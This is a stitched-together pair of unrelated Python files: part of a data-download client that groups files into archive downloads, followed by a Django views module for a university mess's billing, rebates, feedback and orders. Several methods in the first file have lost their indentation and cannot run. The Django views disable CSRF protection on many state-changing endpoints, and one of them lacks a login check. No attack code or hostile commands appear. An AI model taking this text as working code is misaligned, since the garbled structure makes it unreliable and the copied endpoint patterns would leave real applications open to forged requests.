                num_non_cea_sources = 0
                cea_ids = []
                sources = []
                # go through sources and check how many (non-)cea sources there are,
                # index cea sources, or remove cea sources if there is no extraction tool
                for source in file_item['sources']:
                    is_cea = source.get('client_extract', False)
                    if is_cea and (len(self.extraction_tools) > 0):
                        priority = int(source['priority'])
                        if min_cea_priority is None or priority < min_cea_priority:
                            min_cea_priority = priority

                        # workaround since we dont have the archive DID use the part behind the last slash of the PFN
                        # this doesn't respect the scope of the archive DID!!!
                        # and we trust that client_extract==True sources dont have any parameters at the end of the PFN
                        cea_id = source['pfn'].split('/')
                        cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
                        cea_ids.append(cea_id)

                        sources.append(source)
                    elif not is_cea:
                        num_non_cea_sources += 1
                        sources.append(source)
                    else:
                        # no extraction tool
                        logger.debug('client_extract=True; ignoring source: %s' % source['pfn'])

                logger.debug('Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
                             % (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))

                file_item['sources'] = sources

                # if there are no cea sources we are done for this item
                if min_cea_priority is None:
                    continue
                # decide if file item belongs to the pure or mixed map
                # if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
                elif num_non_cea_sources == 0 or min_cea_priority == 1:
                    logger.debug('Adding fiid to cea pure map: '
                                 'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
                                 % (num_non_cea_sources, min_cea_priority, len(cea_ids)))
                    for cea_id in cea_ids:
                        cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
                        file_item.setdefault('cea_ids_pure', set()).add(cea_id)
                # if there are non-archive sources and archive sources we put it in the mixed map
                elif len(cea_ids) > 0:
                    logger.debug('Adding fiid to cea mixed map: '
                                 'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
                                 % (num_non_cea_sources, min_cea_priority, len(cea_ids)))
                    for cea_id in cea_ids:
                        cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
                        file_item.setdefault('cea_ids_mixed', set()).add(cea_id)

    # put all archives from the mixed list into the pure list if they meet
    # certain conditions, e.g., an archive that is already in the pure list
    for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
        fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
        if cea_id_mixed in cea_id_pure_to_fiids:
            # file from mixed list is already in a pure list
            logger.debug('Mixed ID is already in cea pure map: '
                         'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
                         % (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
        elif len(fiids_mixed) >= self.use_cea_threshold:
            # more than use_cea_threshold files are in a common archive
            logger.debug('Number of needed files in cea reached threshold: '
                         'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
                         % (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
        else:
            # dont move from mixed list to pure list
            continue

        # first add cea_id to pure map so it can be removed from mixed map later
        cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)

        # now update all file_item mixed/pure maps
        for fiid_mixed in list(fiids_mixed):
            file_item = fiid_to_file_item[fiid_mixed]
            # add cea id to file_item pure map
            file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)

            # remove file item mixed map and
            # remove references from all other mixed archives to file_item
            for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
                cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)

        # finally remove cea_id from mixed map
        cea_id_mixed_to_fiids.pop(cea_id_mixed)

    # a file with a pure archive source is downloaded via the archive only;
    # a file with only mixed archive sources is downloaded directly
    for file_item in all_file_items:
        cea_ids_pure = file_item.get('cea_ids_pure', set())
        cea_ids_mixed = file_item.get('cea_ids_mixed', set())

        if len(cea_ids_pure) > 0:
            logger.debug('Removing all non-cea sources of file %s' % file_item['did'])
            file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
        elif len(cea_ids_mixed) > 0:
            logger.debug('Removing all cea sources of file %s' % file_item['did'])
            file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]

    # reduce the amount of archives to download by removing
    # all redundant pure archives (=all files can be extracted from other archives)
    for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
        # if all files of this archive are available in more than one archive the archive is redundant
        if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
            for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
                fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
            logger.debug('Removing redundant archive %s' % cea_id_pure)
            cea_id_pure_to_fiids.pop(cea_id_pure)

    # remove all archives of a file except a single one so
    # that each file is assigned to exactly one pure archive
    for cea_id_pure in cea_id_pure_to_fiids:
        for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
            cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']

            for cea_id_pure_other in list(cea_ids_pure):
                if cea_id_pure != cea_id_pure_other:
                    cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
                    cea_ids_pure.discard(cea_id_pure_other)

    # finally build the download packs: files sharing a pure archive are
    # grouped under one archive item, everything else is downloaded directly
    download_packs = []
    cea_id_to_pack = {}
    for file_item in all_file_items:
        cea_ids = file_item.get('cea_ids_pure', set())
        if len(cea_ids) > 0:
            cea_id = next(iter(cea_ids))
            pack = cea_id_to_pack.get(cea_id)
            if pack is None:
                scope = file_item['scope']
                first_dest = next(iter(file_item['merged_options']['destinations']))
                dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, cea_id, first_dest[1]), cea_id)
                pack = {'scope': scope,
                        'name': cea_id,
                        'dest_file_paths': [dest_path],
                        'temp_file_path': '%s.part' % dest_path,
                        'sources': file_item['sources'],
                        'merged_options': {'ignore_checksum': True},  # we currently dont have checksums for the archive
                        'archive_items': []
                        }
                cea_id_to_pack[cea_id] = pack
                download_packs.append(pack)
            file_item.pop('sources')
            pack['archive_items'].append(file_item)
        else:
            download_packs.append(file_item)
    return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
:param did_str: the DID string that will be splitted
:returns: the scope- and name part of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
raise InputValidationError('%s is not a valid DID. To many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
def _prepare_dest_dir(self, base_dir, dest_dir_name, file_name, no_subdir):
"""
Builds the final destination path for a file and:
1. deletes existing files if no_subdir was given
2. creates the destination directory if it's not existent
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param file_name: name of the file that will be downloaded
:param no_subdir: if no subdirectory should be created
:returns: the absolut path of the destination directory
"""
dest_dir_path = os.path.abspath(base_dir)
# if no subdirectory is used, existing files will be overwritten
if no_subdir:
dest_file_path = os.path.join(dest_dir_path, file_name)
if os.path.isfile(dest_file_path):
self.logger.debug('Deleting existing file: %s' % dest_file_path)
os.remove(dest_file_path)
else:
dest_dir_path = os.path.join(dest_dir_path, dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
def _check_output(self, output_items):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if num_successful == 0:
raise NoFilesDownloaded()
elif num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
    """
    Checks if sending trace is allowed and send the trace.

    :param trace: the trace
    """
    if not self.tracing:
        return
    send_trace(trace, self.client.host, self.client.user_agent)
|
views.py | from datetime import date, datetime, timedelta
from django.contrib.auth.decorators import login_required
from django.db import transaction
from threading import Thread
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from django.contrib import messages
from django.views.generic import View
from django.db.models import Count
from django.forms.models import model_to_dict
from django.db.models import Q
from django.contrib.auth.models import User
from .utils import render_to_pdf
from applications.academic_information.models import Student
from applications.globals.models import ExtraInfo, HoldsDesignation, Designation
from .forms import MinuteForm
from .models import (Feedback, Menu, Menu_change_request, Mess_meeting,
Mess_minutes, Mess_reg, Messinfo, Monthly_bill,
Nonveg_data, Nonveg_menu, Payments, Rebate,
Special_request, Vacation_food, MessBillBase)
from .handlers import (add_nonveg_order, add_mess_feedback, add_vacation_food_request,
add_menu_change_request, handle_menu_change_response, handle_vacation_food_request,
add_mess_registration_time, add_leave_request, add_mess_meeting_invitation,
handle_rebate_response, add_special_food_request,
handle_special_request, add_bill_base_amount, add_mess_committee, generate_bill)
from notification.views import central_mess_notif
# NOTE(review): all of the date values below are computed ONCE, at module import
# time, not per request. In a long-running server process they go stale after
# midnight / a month rollover, so the bill and rebate calculations in the views
# below may use outdated month boundaries — confirm whether these should be
# computed inside the views instead.
today_g = datetime.today()
month_g = today_g.month                 # current month number (at import time)
month_g_l = today_g.strftime('%B')      # current month name, e.g. 'March'
year_g = today_g.year
tomorrow_g = today_g + timedelta(days=1)
first_day_of_this_month = date.today().replace(day=1)
# day-28 + 4 days always lands in the next month, regardless of month length
first_day_of_next_month = (date.today().replace(day=28) + timedelta(days=4)).replace(day=1)
last_day_of_this_month = first_day_of_next_month - timedelta(days=1)
next_month = first_day_of_next_month.month
last_day_prev_month = first_day_of_this_month - timedelta(days=1)
month_last_g = last_day_prev_month.month
year_last_g = last_day_prev_month.year
previous_month = last_day_prev_month.strftime('%B')
def mess(request):
    """
    Render the central mess dashboard for the current user.

    The view branches on ExtraInfo.user_type:
    - 'student': computes the monthly bill (rebates + non-veg orders) and, if the
      student also holds a mess committee/convener designation, adds feedback
      statistics and menu-change/special-request data to the context.
    - 'staff': shows non-veg order summaries, vacation food and rebate requests.
    - 'faculty': shows mess meetings, minutes and feedback statistics.

    :param request: the HTTP request; request.user must be authenticated
    :return: rendered messModule/mess.html with a branch-specific context
    """
    user = request.user
    extrainfo = ExtraInfo.objects.get(user=user)
    current_date = date.today()
    holds_designations = HoldsDesignation.objects.filter(user=user)
    desig = holds_designations
    print(desig)  # debug print left in place
    form = MinuteForm()
    mess_reg = Mess_reg.objects.last()
    # feedback counters: count1-4 for mess1, count5-8 for mess2
    # (Maintenance / Food / Cleanliness / Others respectively)
    count1 = 0
    count2 = 0
    count3 = 0
    count4 = 0
    count5 = 0
    count6 = 0
    count7 = 0
    count8 = 0
    if extrainfo.user_type == 'student':
        student = Student.objects.get(id=extrainfo)
        vaca_obj = Vacation_food.objects.filter(student_id=student)
        feedback_obj = Feedback.objects.filter(student_id=student).order_by('-fdate')
        data = Nonveg_data.objects.filter(student_id=student).order_by('-app_date')
        monthly_bill = Monthly_bill.objects.filter(student_id=student)
        payments = Payments.objects.filter(student_id=student)
        rebates = Rebate.objects.filter(student_id=student).order_by('-app_date')
        splrequest = Special_request.objects.filter(student_id=student).order_by('-app_date')
        mess_optn = Messinfo.objects.get(student_id=student)
        print(student)  # debug prints left in place
        print(33333333333333333333333333333333333)
        # programme flag controls template behaviour for UG vs PG students
        if student.programme == 'B.Tech' or student.programme == 'B.Des':
            programme = 1
        else:
            programme = 0
        # newmenu = Menu_change_request.objects.all()
        # meeting = Mess_meeting.objects.all()
        # minutes = Mess_minutes.objects.all()
        # feed = Feedback.objects.all()
        # sprequest = Special_request.objects.filter(status='1')
        count = 0
        #variable y stores the menu items
        y = Menu.objects.filter(mess_option=mess_optn.mess_option)
        x = Nonveg_menu.objects.all()
        # persist the (inclusive) duration of every rebate request
        for item in rebates:
            d1 = item.start_date
            d2 = item.end_date
            item.duration = abs((d2 - d1).days)+1
            item.save()
        # for items in rebates:
        # if items.leave_type == 'casual' and (items.status == '1' or items.status == '2'):
        # count += item.duration
        bill = Monthly_bill.objects.filter(Q(student_id=student) & Q(month=month_g_l) & Q(year=year_g))
        amount_c = MessBillBase.objects.latest('timestamp')
        rebate_count = 0
        nonveg_total_bill = 0
        # sum non-veg orders placed in the current month
        for z in data:
            if z.order_date.month == month_g:
                nonveg_total_bill = nonveg_total_bill + z.dish.price
            else:
                # NOTE(review): this sets an attribute on the `bill` queryset,
                # which has no effect on the local total — looks like it was
                # meant to be `nonveg_total_bill = 0`; confirm before changing
                bill.nonveg_total_bill = 0
        # count days covered by approved rebates (status '2'), clipped to this month
        for r in rebates:
            if r.status == '2':
                if r.start_date.month == month_g:
                    if r.end_date.month == next_month:
                        # rebate spills into next month: count only up to month end
                        rebate_count = rebate_count + abs((last_day_of_this_month - r.start_date).days) + 1
                    else:
                        rebate_count = rebate_count + abs((r.end_date - r.start_date).days) + 1
                elif r.end_date.month == month_g:
                    # rebate started last month: count only from month start
                    rebate_count = rebate_count + abs((r.end_date - first_day_of_this_month).days) + 1
            else:
                # NOTE(review): a later non-approved rebate resets the running
                # total — confirm this ordering-dependent behaviour is intended
                rebate_count = 0
        # rebate is prorated against a fixed 30-day month
        rebate_amount = rebate_count * amount_c.bill_amount / 30
        total_bill = amount_c.bill_amount - rebate_amount + nonveg_total_bill
        # update this month's bill row if it exists, otherwise create it
        if bill:
            bill.update(student_id = student,
                        month = month_g_l,
                        year = year_g,
                        amount = amount_c.bill_amount,
                        rebate_count = rebate_count,
                        rebate_amount = rebate_amount,
                        nonveg_total_bill=nonveg_total_bill,
                        total_bill = total_bill)
        else:
            bill_object = Monthly_bill(student_id=student,
                                       amount=amount_c.bill_amount,
                                       rebate_count=rebate_count,
                                       rebate_amount=rebate_amount,
                                       nonveg_total_bill=nonveg_total_bill,
                                       total_bill=total_bill,
                                       month=month_g_l,
                                       year=year_g)
            bill_object.save()
        # students holding a committee/convener designation get the extended view
        for d in desig:
            if d.designation.name == 'mess_committee_mess1' or d.designation.name == 'mess_convener_mess1':
                newmenu = Menu_change_request.objects.filter(dish__mess_option='mess1').order_by('-app_date')
                # newmenu = Menu_change_request.objects.all()
                meeting = Mess_meeting.objects.all()
                minutes = Mess_minutes.objects.all()
                feed = Feedback.objects.filter(mess='mess1').order_by('-fdate')
                feed2 = Feedback.objects.filter(mess='mess2').order_by('-fdate')
                sprequest = Special_request.objects.filter(status='1').order_by('-app_date')
                sprequest_past = Special_request.objects.filter(status='2').order_by('-app_date')
                # count1 = feed.filter(Q(feedback_type='Maintenance') & Q(mess='mess1')).count()
                # tally feedback per category; NOTE(review): the condition also
                # checks the *viewing* student's own mess option — confirm that
                # is intended rather than just f.feedback_type
                for f in feed:
                    if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess1':
                        count1 += 1
                    elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess1':
                        count2 += 1
                    elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess1':
                        count3 += 1
                    elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess1':
                        count4 += 1
                for f in feed2:
                    if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess2':
                        count5 += 1
                    elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess2':
                        count6 += 1
                    elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess2':
                        count7 += 1
                    elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess2':
                        count8 += 1
                context = {
                    'menu': y,
                    'messinfo': mess_optn,
                    'newmenu': newmenu,
                    'monthly_bill': monthly_bill,
                    'payments': payments,
                    'nonveg': x,
                    'vaca': vaca_obj,
                    'info': extrainfo,
                    'feedback': feedback_obj,
                    'feed': feed,
                    'student': student,
                    'data': data,
                    'mess_reg': mess_reg,
                    'current_date': current_date,
                    'count': count,
                    'rebates': rebates,
                    'meeting': meeting,
                    'minutes': minutes,
                    'sprequest': sprequest,
                    'splrequest': splrequest,
                    'sprequest_past': sprequest_past,
                    'programme':programme,
                    'count1': count1,
                    'count2': count2,
                    'count3': count3,
                    'count4': count4,
                    'count5': count5,
                    'count6': count6,
                    'count7': count7,
                    'count8': count8,
                    'form': form,
                    'desig': desig
                }
                return render(request, "messModule/mess.html", context)
            if d.designation.name == 'mess_committee_mess2' or d.designation.name == 'mess_convener_mess2':
                # newmenu = Menu_change_request.objects.all()
                newmenu = Menu_change_request.objects.filter(dish__mess_option='mess2').order_by('-app_date')
                meeting = Mess_meeting.objects.all()
                minutes = Mess_minutes.objects.all()
                feed = Feedback.objects.filter(mess='mess2').order_by('-fdate')
                feed2 = Feedback.objects.filter(mess='mess1').order_by('-fdate')
                sprequest = Special_request.objects.filter(status='1').order_by('-app_date')
                sprequest_past = Special_request.objects.filter(status='2').order_by('-app_date')
                # count5 = feed.filter(Q(feedback_type='Maintenance') & Q(mess='mess2')).count()
                for f in feed2:
                    if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess1':
                        count1 += 1
                    elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess1':
                        count2 += 1
                    elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess1':
                        count3 += 1
                    elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess1':
                        count4 += 1
                for f in feed:
                    if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess2':
                        count5 += 1
                    elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess2':
                        count6 += 1
                    elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess2':
                        count7 += 1
                    elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess2':
                        count8 += 1
                context = {
                    'menu': y,
                    'messinfo': mess_optn,
                    'newmenu': newmenu,
                    'monthly_bill': monthly_bill,
                    'payments': payments,
                    'nonveg': x,
                    'vaca': vaca_obj,
                    'info': extrainfo,
                    'feedback': feedback_obj,
                    'feed': feed,
                    'student': student,
                    'data': data,
                    'mess_reg': mess_reg,
                    'current_date': current_date,
                    'count': count,
                    'rebates': rebates,
                    'programme': programme,
                    'meeting': meeting,
                    'minutes': minutes,
                    'sprequest': sprequest,
                    'splrequest': splrequest,
                    'sprequest_past': sprequest_past,
                    'count1': count1,
                    'count2': count2,
                    'count3': count3,
                    'count4': count4,
                    'count5': count5,
                    'count6': count6,
                    'count7': count7,
                    'count8': count8,
                    'form': form,
                    'desig': desig
                }
                return render(request, "messModule/mess.html", context)
        # plain student (no committee designation): basic dashboard
        context = {
            'menu': y,
            'messinfo': mess_optn,
            'monthly_bill': monthly_bill,
            'payments': payments,
            'nonveg': x,
            'vaca': vaca_obj,
            'info': extrainfo,
            'feedback': feedback_obj,
            'student': student,
            'data': data,
            'mess_reg': mess_reg,
            'current_date': current_date,
            'count': count,
            'rebates': rebates,
            'splrequest': splrequest,
            'form': form,
            'programme': programme,
            'desig': desig
        }
        return render(request, "messModule/mess.html", context)
    elif extrainfo.user_type == 'staff':
        current_bill = MessBillBase.objects.latest('timestamp')
        # aggregate non-veg orders per dish and meal for today and tomorrow
        nonveg_orders_today = Nonveg_data.objects.filter(order_date=today_g)\
            .values('dish__dish','order_interval').annotate(total=Count('dish'))
        nonveg_orders_tomorrow = Nonveg_data.objects.filter(order_date=tomorrow_g)\
            .values('dish__dish','order_interval').annotate(total=Count('dish'))
        # make info with diff name and then pass context
        newmenu = Menu_change_request.objects.all().order_by('-app_date')
        vaca_all = Vacation_food.objects.all().order_by('-app_date')
        # members_mess = HoldsDesignation.objects.filter(designation__name='mess_convener')
        members_mess = HoldsDesignation.objects.filter(Q(designation__name__contains='mess_convener')
                                                       | Q(designation__name__contains='mess_committee'))
        print(members_mess)  # debug print left in place
        y = Menu.objects.all()
        x = Nonveg_menu.objects.all()
        leave = Rebate.objects.filter(status='1').order_by('-app_date')
        leave_past = Rebate.objects.filter(status='2').order_by('-app_date')
        context = {
            'bill_base': current_bill,
            'today': today_g.date(),
            'tomorrow': tomorrow_g.date(),
            'nonveg_orders_t':nonveg_orders_tomorrow,
            'nonveg_orders': nonveg_orders_today,
            'members': members_mess,
            'menu': y,
            'newmenu': newmenu,
            'vaca_all': vaca_all,
            'info': extrainfo,
            'leave': leave,
            'leave_past': leave_past,
            'current_date': current_date,
            'mess_reg': mess_reg,
            'desig': desig,
        }
        return render(request, "messModule/mess.html", context)
    elif extrainfo.user_type == 'faculty':
        meeting = Mess_meeting.objects.all()
        minutes = Mess_minutes.objects.all()
        feed = Feedback.objects.all().order_by('-fdate')
        y = Menu.objects.all()
        # tally feedback per category for mess1 (count1-4) ...
        for f in feed:
            mess_opt = Messinfo.objects.get(student_id=f.student_id)
            if f.feedback_type == 'Maintenance' and mess_opt.mess_option == 'mess1':
                count1 += 1
            elif f.feedback_type == 'Food' and mess_opt.mess_option == 'mess1':
                count2 += 1
            elif f.feedback_type == 'Cleanliness' and mess_opt.mess_option == 'mess1':
                count3 += 1
            elif f.feedback_type == 'Others' and mess_opt.mess_option == 'mess1':
                count4 += 1
        # ... and for mess2 (count5-8); NOTE(review): this re-queries Messinfo
        # per feedback row a second time — could be folded into one loop
        for f in feed:
            mess_opt = Messinfo.objects.get(student_id=f.student_id)
            if f.feedback_type == 'Maintenance' and mess_opt.mess_option == 'mess2':
                count5 += 1
            elif f.feedback_type == 'Food' and mess_opt.mess_option == 'mess2':
                count6 += 1
            elif f.feedback_type == 'Cleanliness' and mess_opt.mess_option == 'mess2':
                count7 += 1
            elif f.feedback_type == 'Others' and mess_opt.mess_option == 'mess2':
                count8 += 1
        context = {
            'info': extrainfo,
            'menu': y,
            'meeting': meeting,
            'minutes': minutes,
            'count1': count1,
            'count2': count2, 'count3': count3, 'feed': feed,
            'count4': count4, 'form': form, 'count5': count5,
            'count6': count6, 'count7': count7, 'count8': count8, 'desig': desig
        }
        return render(request, 'messModule/mess.html', context)
@login_required
@transaction.atomic
@csrf_exempt
def place_order(request):
    """
    This function is to place non-veg food orders

    :param request:
        user: Current user
        order_interval: Time of the day for which order is placed eg breakfast/lunch/dinner
    :variables:
        extra_info: Extra information about the current user. From model ExtraInfo
        student: Student information about the current user
        student_mess: Mess choices of the student
    :return:
        redirect to /mess in every case (non-students fall through without ordering)
    """
    user = request.user
    extra_info = ExtraInfo.objects.get(user=user)
    if extra_info.user_type == 'student':
        student = Student.objects.get(id=extra_info)
        # NOTE(review): student_mess is never used afterwards, but the .get()
        # acts as an implicit existence check (raises DoesNotExist if the
        # student has no Messinfo row) — confirm before removing
        student_mess = Messinfo.objects.get(student_id=student)
        add_nonveg_order(request, student)
    return HttpResponseRedirect('/mess')
@csrf_exempt
@login_required
@transaction.atomic
def submit_mess_feedback(request):
    """
    This function is to record the feedback submitted

    :param request:
        user: Current logged in user
    :variable:
        extra_info: Extra information of the user
        student: Student record backing the current user
    :return:
        data: JsonResponse to record success or any errors
    """
    user = request.user
    extra_info = ExtraInfo.objects.get(user=user)
    if extra_info.user_type == 'student':
        # only students have a Student record; looking it up before the
        # user_type check crashed (DoesNotExist) for staff/faculty users
        student = Student.objects.get(id=extra_info)
        data = add_mess_feedback(request, student)
        central_mess_notif(request.user, request.user, 'feedback_submitted')
    else:
        # previously `data` was undefined on this path, so the final
        # JsonResponse raised a NameError (HTTP 500) for non-students
        data = {'status': 0, 'message': 'Only students can submit mess feedback.'}
    return JsonResponse(data)
@csrf_exempt
@login_required
@transaction.atomic
def mess_vacation_submit(request):
    """
    Record a vacation food request from a student.

    :return: JsonResponse from the handler, or a failure status for
             non-student callers (the original raised UnboundLocalError
             for them and looked up Student before checking user_type).
    """
    extra_info = ExtraInfo.objects.get(user=request.user)
    data = {'status': 0, 'message': 'Only students can submit vacation food requests'}
    if extra_info.user_type == 'student':
        student = Student.objects.get(id=extra_info)
        data = add_vacation_food_request(request, student)
    return JsonResponse(data)
@login_required
@transaction.atomic
def submit_mess_menu(request):
    """
    Record a mess-menu change request raised by the mess committee.

    Redirects to the mess page when the request is accepted; otherwise
    re-renders the mess page.
    """
    # TODO add ajax for this
    current_user = request.user
    designation = HoldsDesignation.objects.filter(user=current_user)
    info = ExtraInfo.objects.get(user=current_user)
    applicant = Student.objects.get(id=info)
    result = add_menu_change_request(request, applicant)
    if result['status'] == 1:
        return HttpResponseRedirect("/mess")
    return render(request, 'messModule/mess.html', {})
@login_required
def menu_change_response(request):
    """
    Approve or reject a pending mess-menu change request.

    Delegates to ``handle_menu_change_response`` and returns its result
    as JSON.
    """
    # Lazily-built queryset kept to mirror the original flow; it is
    # never evaluated here.
    designation = HoldsDesignation.objects.filter(user=request.user)
    return JsonResponse(handle_menu_change_response(request))
@login_required
def response_vacation_food(request, ap_id):
    """
    Respond to a vacation food request (mess manager only).

    :param request: HTTP request of the current user.
    :param ap_id: id of the vacation food application being answered.
    :return: redirect back to the mess page.
    """
    for held in HoldsDesignation.objects.filter(user=request.user):
        if held.designation.name == 'mess_manager':
            handle_vacation_food_request(request, ap_id)
    return HttpResponseRedirect("/mess")
@login_required
@transaction.atomic
def regsubmit(request):
    """
    Register the student's mess choice and seed the half-year's bills.

    Saves the posted mess option; if the student has no Monthly_bill rows
    yet, creates one empty bill per month of the relevant half year
    (Jan-Jun or Jul-Dec, chosen by the registration window's end month).
    """
    first_half = ['January', 'February', 'March', 'April', 'May', 'June']
    second_half = ['July', 'August', 'September', 'October', 'November', 'December']
    extrainfo = ExtraInfo.objects.get(user=request.user)
    if extrainfo.user_type != 'student':
        return redirect('mess')
    student = Student.objects.get(id=extrainfo)
    mess_info = Messinfo.objects.get(student_id=student)
    mess_info.mess_option = request.POST.get('mess_type')
    mess_info.save()
    registration = Mess_reg.objects.last()
    if Monthly_bill.objects.filter(student_id=student):
        return HttpResponseRedirect("/mess")
    # Pick the half of the year that the registration window ends in.
    months = first_half if registration.end_reg.strftime("%B") in first_half else second_half
    for month in months:
        # year_last_g is a module-level global defined elsewhere in this file.
        Monthly_bill(student_id=student, month=month, year=year_last_g).save()
    return HttpResponseRedirect("/mess")
@login_required
@transaction.atomic
def start_mess_registration(request):
    """
    Open a mess registration window (mess manager only).

    :return: JsonResponse with the handler's status, or a failure status
             when the caller does not hold the mess_manager designation.
    """
    # TODO ajax convert add a section to see previous sessions as well as close a session
    # Default response: without it the original raised UnboundLocalError
    # for any caller who is not a mess manager.
    data = {'status': 0, 'message': 'Only the mess manager can start registration'}
    for d in HoldsDesignation.objects.filter(user=request.user):
        if d.designation.name == 'mess_manager':
            data = add_mess_registration_time(request)
    return JsonResponse(data)
@transaction.atomic
@csrf_exempt
def mess_leave_request(request):
    """
    Record and validate a mess leave (rebate) request from a student.

    :return: JsonResponse produced by ``add_leave_request``.
    """
    info = ExtraInfo.objects.get(user=request.user)
    applicant = Student.objects.get(id=info)
    return JsonResponse(add_leave_request(request, applicant))
@login_required
@transaction.atomic
def minutes(request):
    """
    Upload the minutes of a mess committee meeting.

    Saves the uploaded file when the form validates; in every case the
    user is redirected back to the mess page.  (The original fell
    through and returned None — an invalid HTTP response — when the
    form failed validation.)
    """
    if request.method == 'POST' and request.FILES:
        form = MinuteForm(request.POST, request.FILES)
        if form.is_valid():
            form.save()
    return HttpResponseRedirect('/mess')
@csrf_exempt
@transaction.atomic
def invitation(request):
    """
    Schedule a mess committee meeting.

    Delegates to ``add_mess_meeting_invitation`` and returns its JSON
    result.
    """
    # todo add ajax to this page as well
    return JsonResponse(add_mess_meeting_invitation(request))
@login_required
@transaction.atomic
@csrf_exempt
def rebate_response(request):
    """
    Respond to a rebate (leave) request; only a mess manager's response
    is processed.

    :return: JsonResponse with the application status (defaults to 1
             when the caller is not a mess manager).
    """
    response = {'status': 1}
    for held in HoldsDesignation.objects.filter(user=request.user):
        if held.designation.name == 'mess_manager':
            response = handle_rebate_response(request)
    return JsonResponse(response)
@login_required
@transaction.atomic
@csrf_exempt
def place_request(request):
    """
    Place a special food request (students only).

    :return: JsonResponse with the handler's status, or a failure status
             for non-student callers.  The original raised
             UnboundLocalError for non-students and queried ExtraInfo
             twice for students.
    """
    extra_info = ExtraInfo.objects.get(user=request.user)
    data = {'status': 0, 'message': 'Only students can place special food requests'}
    if extra_info.user_type == 'student':
        student = Student.objects.get(id=extra_info)
        data = add_special_food_request(request, student)
    return JsonResponse(data)
@login_required
@transaction.atomic
@csrf_exempt
def special_request_response(request):
    """
    Respond to a student's special food request.

    :return: JsonResponse with the handler's message/status.
    """
    return JsonResponse(handle_special_request(request))
@login_required
@transaction.atomic
@csrf_exempt
def update_cost(request):
    """
    Update the base cost used for the monthly central mess bill.

    :return: JsonResponse with the handler's status.
    """
    return JsonResponse(add_bill_base_amount(request))
def generate_mess_bill(request):
    """
    Kick off monthly mess bill generation on a background thread.

    The heavy lifting happens in ``generate_bill``; the request returns
    immediately with status 1 while the daemon thread keeps working.
    """
    # Thread(daemon=True) replaces the deprecated setDaemon() call.
    worker = Thread(target=generate_bill, daemon=True)
    worker.start()
    return JsonResponse({'status': 1})
class MenuPDF(View):
    """Render the mess menu as a downloadable PDF for the current user."""

    def post(self, request, *args, **kwargs):
        extra_info = ExtraInfo.objects.get(user=request.user)
        menu = Menu.objects.all()
        if extra_info.user_type == 'student':
            student = Student.objects.get(id=extra_info)
            option = Messinfo.objects.get(student_id=student).mess_option
